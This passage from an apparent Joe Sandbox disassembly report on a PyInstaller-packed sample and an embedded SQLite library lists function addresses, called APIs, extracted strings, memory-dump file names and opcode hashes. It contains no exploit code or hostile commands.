String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 1405196051-3727861699
Opcode ID: 67dc44a78d9e748f69a167c79ebf504151bc07e9d0180a1d626db382376bfe5e
Instruction ID: 34c0e7f96abc1991ee0287c1a3a73e5688460cfaf1e729c3f88943589a85fa46
Opcode Fuzzy Hash: 67dc44a78d9e748f69a167c79ebf504151bc07e9d0180a1d626db382376bfe5e
Instruction Fuzzy Hash: 5E91E262B082C286D718DB2695A0ABD77E0FB40B84F088176DBAE876D9DF3DF455D700

Function 00007FFDFAEFB050 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 197COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFAEF9890: 00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAEF98FD
Part of subcall function 00007FFDFAEF9890: 00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAEF9924

00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAEFB2D3
00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAEFB2E9

Strings

%s at line %d of [%.10s], xrefs: 00007FFDFAEFB117
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFAEFB0F7
database corruption, xrefs: 00007FFDFAEFB110

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 1405196051-3727861699
Opcode ID: 47932e3adf19c9dccdb3695a3e791271d07a0c4d778819a994211745928df37f
Instruction ID: 33857b50e2b3fe28eec2ef356296a6c5892fb87438ea9310486974ec1a866af0
Opcode Fuzzy Hash: 47932e3adf19c9dccdb3695a3e791271d07a0c4d778819a994211745928df37f
Instruction Fuzzy Hash: BB81F3327086C28AE768AF29D464BAE77A4FB85784F008076EB9E477D9DF39D445C700

Function 00007FF644872910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF644871B6A), ref: 00007FF64487295E

Strings

Error [ANSI Fallback], xrefs: 00007FF6448729FF
%s: %s, xrefs: 00007FF6448729E8
[PYI-%d:ERROR] , xrefs: 00007FF644872966
Error, xrefs: 00007FF644872A0E

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: CurrentProcess
String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
API String ID: 2050909247-2962405886
Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
Instruction ID: c20a647caed65085ac9ef6587e4d0c427b5eeee04c72160e1ea21244308e7c28
Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
Instruction Fuzzy Hash: 2231B322B1CA815AE720B765BC926E66295BF887D8F440132EE8DD3B5DEF3CD5468300

Function 00007FF644872390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6448723C8
DialogBoxIndirectParamW.USER32 ref: 00007FF64487248E
DeleteObject.GDI32 ref: 00007FF6448724C1
DestroyIcon.USER32 ref: 00007FF6448724D3

Strings

Unhandled exception in script, xrefs: 00007FF6448723F8

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 3b326f38696452fedce944a8216705a7f012b21920c96e855d1ab8eaac442c5d
Instruction ID: a82264effe2ec24202ea947d750503a123ebcf04e50caae4233acd9fbfa6f3ac
Opcode Fuzzy Hash: 3b326f38696452fedce944a8216705a7f012b21920c96e855d1ab8eaac442c5d
Instruction Fuzzy Hash: 4831D866A1DA8289EB24FB61AC962F96360FF89B84F440135EE4D87A59EF3CD1458700

Function 00007FF644872B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF64487918F,?,00007FF644873C55), ref: 00007FF644872BA0
MessageBoxW.USER32 ref: 00007FF644872C2A

Strings

[PYI-%d:%ls] , xrefs: 00007FF644872BA8
WARNING, xrefs: 00007FF644872BAF
Warning, xrefs: 00007FF644872C1D

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: CurrentMessageProcess
String ID: WARNING$Warning$[PYI-%d:%ls]
API String ID: 1672936522-3797743490
Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
Instruction ID: f9bf8b7b704f7107f9305663a7eec017aadffaf8da79c1e39107c88bd79daa05
Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
Instruction Fuzzy Hash: FE218E62B0CB419AE710BB54F8967AA73A4FB88784F404136EE8D97B59EF3CD245C740

Function 00007FF644872710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF644871B99), ref: 00007FF644872760

Strings

[PYI-%d:%s] , xrefs: 00007FF644872768
Error [ANSI Fallback], xrefs: 00007FF6448727CF
ERROR, xrefs: 00007FF64487276F
Error, xrefs: 00007FF6448727DE

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: CurrentProcess
String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-1591803126
Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
Instruction ID: f1062883099410325f6b43604b6ad7cfd12f1d3260681a5ed22c0c0078e9b403
Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
Instruction Fuzzy Hash: 9F216D32B1CB8186E720FB50B8927E66294BB88784F400135EE8C93A59DF7CD2458740

Function 00007FF644889A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF644889AAD
GetProcAddress.KERNEL32 ref: 00007FF644889AC3
FreeLibrary.KERNEL32 ref: 00007FF644889AEA

Strings

CorExitProcess, xrefs: 00007FF644889ABC
mscoree.dll, xrefs: 00007FF644889AA4

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
Instruction ID: 40577bb7c6bfeb44d1998746ff6c2b4668a3fe741a893451acfb609e52a2faeb
Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
Instruction Fuzzy Hash: 78F06261B0DB06C5EA10BB24E4C637A6360BF85761F540235DE6E866ECDF6DD484D300

Function 00007FF644899368 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF644899390
_set_statfp.LIBCMT ref: 00007FF6448993AB
_set_statfp.LIBCMT ref: 00007FF6448993C7
_set_statfp.LIBCMT ref: 00007FF644899403

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: 2a3cb33d07c6d7ce1eacf8864a87d6596df5df05675b3a989bba9e6b98e5f527
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: A4118222E5CE03CAFA64356DE4D33791250AF59360E081634EE6ED67EECE6FE8815100

Function 00007FF64488B390 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF64488A5A3,?,?,00000000,00007FF64488A83E,?,?,?,?,?,00007FF64488A7CA), ref: 00007FF64488B3AF
FlsSetValue.KERNEL32(?,?,?,00007FF64488A5A3,?,?,00000000,00007FF64488A83E,?,?,?,?,?,00007FF64488A7CA), ref: 00007FF64488B3CE
FlsSetValue.KERNEL32(?,?,?,00007FF64488A5A3,?,?,00000000,00007FF64488A83E,?,?,?,?,?,00007FF64488A7CA), ref: 00007FF64488B3F6
FlsSetValue.KERNEL32(?,?,?,00007FF64488A5A3,?,?,00000000,00007FF64488A83E,?,?,?,?,?,00007FF64488A7CA), ref: 00007FF64488B407
FlsSetValue.KERNEL32(?,?,?,00007FF64488A5A3,?,?,00000000,00007FF64488A83E,?,?,?,?,?,00007FF64488A7CA), ref: 00007FF64488B418

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
Instruction ID: 99f5a9e2c2bbc384b88379fd951a1a590d0538946315b72c276934a069b0bbb4
Opcode Fuzzy Hash: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
Instruction Fuzzy Hash: BF113A20F0D64289FA58B72599D327921815FC47B0F488734EE7ED66DEDE2CF8428301

Function 00007FF64488B224 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF64488B235
FlsSetValue.KERNEL32 ref: 00007FF64488B254
FlsSetValue.KERNEL32 ref: 00007FF64488B27C
FlsSetValue.KERNEL32 ref: 00007FF64488B28D
FlsSetValue.KERNEL32 ref: 00007FF64488B29E

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: cf61fb6c00b1796c5bed08ecf7b6551a73a14dc995a044f45feadad5ae41d3ad
Instruction ID: ac01e6505b14a9b000f88cec93a8ad75612aa772c9034d967890d4e6e7cc83bc
Opcode Fuzzy Hash: cf61fb6c00b1796c5bed08ecf7b6551a73a14dc995a044f45feadad5ae41d3ad
Instruction Fuzzy Hash: 60119320E4D2078DF969B36558D717A21424FC5771F184B34EE3EDA6DBDE2CF8418211

Function 00007FFDFAF59870 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 288COMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140(?,?,?,?,?,?,?,00000000,00000000,?,?,00000000,00007FFDFAF5A0B5,?,?,?), ref: 00007FFDFAF59A37

Strings

%.*z:%u, xrefs: 00007FFDFAF59B06
rowid, xrefs: 00007FFDFAF599C8
column%d, xrefs: 00007FFDFAF59A45

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: %.*z:%u$column%d$rowid
API String ID: 1405196051-2903559916
Opcode ID: 83c75c440adf2a9d1edf7cf93b27a2f3e27624414c59e452312b9623cb35f1b5
Instruction ID: 4f268dc28e8008e0190659570c657dcd5a8e4ac229119e2e7babf5cb2c4fa748
Opcode Fuzzy Hash: 83c75c440adf2a9d1edf7cf93b27a2f3e27624414c59e452312b9623cb35f1b5
Instruction Fuzzy Hash: 74B1E726B0D78289FB2D9B1594A0BB96790EF41BA4F4946B5EE6D0B3D9DF3CE501C300

Function 00007FF644885FA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF644885FDC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF644886106
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6448861BC

Strings

verbose, xrefs: 00007FF644885FB0

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction ID: 1f674e9f8a991638cdd11a2d3807376ee97b4782cdb607caecd41c26ae368c00
Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction Fuzzy Hash: A291CF22A0CA4689FB61BE24D49277D37A1AF40B94F444936DE5DE73DAEF3CE8458301

Function 00007FFDFAF686F0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 239COMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFDFAF68BBF), ref: 00007FFDFAF68889
00007FFE148D2010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFDFAF68BBF), ref: 00007FFDFAF6890B
00007FFE148D2010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFDFAF68BBF), ref: 00007FFDFAF689FD

Strings

RETURNING may not use "TABLE.*" wildcards, xrefs: 00007FFDFAF68771

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: RETURNING may not use "TABLE.*" wildcards
API String ID: 1405196051-2313493979
Opcode ID: 146eb460578fec6d1865fa0f9d6aa01ca58768e43229fe6905c3daccb3e00cc8
Instruction ID: 8cb2183f5bfc91493e7aa83f607f784ef114fcbff11894659d3bb7ef3571567f
Opcode Fuzzy Hash: 146eb460578fec6d1865fa0f9d6aa01ca58768e43229fe6905c3daccb3e00cc8
Instruction Fuzzy Hash: 4AB1AE22B18B8185E724CB25D5606A967A1FB55BE4F098339EEBD0B7D9DF38E091C340

Function 00007FFDFAF1D440 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 220COMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFAF17857), ref: 00007FFDFAF1D59A
00007FFE148D2010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFAF17857), ref: 00007FFDFAF1D5C4
00007FFE148D2010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFAF17857), ref: 00007FFDFAF1D617

Strings

H, xrefs: 00007FFDFAF1D5AE

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: H
API String ID: 1405196051-2852464175
Opcode ID: 514d7303eeb31d981147c69c7a56ef58d2f0ef438fa373e1b1835ae557823639
Instruction ID: 49db1a35a975a2b5379763e25fd86c2c98407363e96df478ce4f140f23fca2f1
Opcode Fuzzy Hash: 514d7303eeb31d981147c69c7a56ef58d2f0ef438fa373e1b1835ae557823639
Instruction Fuzzy Hash: FA91AF6671964196EB388E169060B7967B0FF84BE8F544774EEAD4B7D8CF3CE4508B00

Function 00007FF64488FBC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF64488FEA7

Part of subcall function 00007FF644887A3C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF644887A59

Strings

UTF-16LEUNICODE, xrefs: 00007FF64488FE45
ccs, xrefs: 00007FF64488FDE2
UTF-8, xrefs: 00007FF64488FE26

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
Instruction ID: 89d22a8eaef4cfcf86cb4a76e77747351a330e24ebd7da863516a121a4618b7c
Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
Instruction Fuzzy Hash: DC818972E0C2538DE775BE29818227936A1AF11B88F558035DF09DB28FDF2DE9029301

Function 00007FFDFAF59510 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 198COMMON

Download Yara Rule

Strings

%s.%s, xrefs: 00007FFDFAF5968E
rowid, xrefs: 00007FFDFAF5966E
column%d, xrefs: 00007FFDFAF59718

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID:
String ID: %s.%s$column%d$rowid
API String ID: 0-1505470444
Opcode ID: a3ad4fa662da839f3409e5dc7edcc0671dfe5c2e36a581b2c6be11a329ffccef
Instruction ID: abab5f9e9fdfcd7d56a35f5777bb6a207762b503dbe84de99c4dea4ffd63e98b
Opcode Fuzzy Hash: a3ad4fa662da839f3409e5dc7edcc0671dfe5c2e36a581b2c6be11a329ffccef
Instruction Fuzzy Hash: 1591BF26B08B8185EB289B15E4A47A967A4FF45BF4F494376EA7D0B7D8DF39D401C300

Function 00007FFDFAEF8980 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 192COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 00007FFDFAEF8A46
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFAEF8A2C
database corruption, xrefs: 00007FFDFAEF8A3F

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

